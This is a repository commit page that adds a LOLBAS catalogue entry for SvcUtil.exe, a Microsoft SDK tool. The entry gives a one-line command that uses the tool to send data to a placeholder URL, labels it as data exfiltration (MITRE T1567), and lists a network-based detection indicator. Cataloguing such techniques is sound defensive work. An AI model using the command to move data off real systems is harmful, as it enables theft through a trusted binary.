public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-26 14:59:03 +01:00
Code Issues Projects Releases Wiki Activity

Add SvcUtil.yml

Browse Source
This commit is contained in:
Avihay Eldad 2024-04-25 14:22:12 +03:00 committed by GitHub
parent fc23c999e6
commit 8533a8c90d
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 22 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
yml/OtherMSBinaries/SvcUtil.yml Normal file
View File

@ -0,0 +1,22 @@
---
Name: SvcUtil.exe
Description: ServiceModel Metadata Utility Tool included with the Microsoft Windows SDK
Author: Avihay Eldad
Created: 2024-04-25
Commands:
- Command: SvcUtil.exe http://example.com/ExfilData
Description: Upload file, credentials or data exfiltration in general
Usecase: Exfilitrate data to remote server
Category: Upload
Privileges: User
MitreID: T1567
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\{version}\bin\NETFX {version} Tools\SvcUtil.exe
Detection:
- IOC: SvcUtil making unexpected network connections or DNS requests
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'
- Person: Yuval Saban
Handle: '@yuvalsaban3'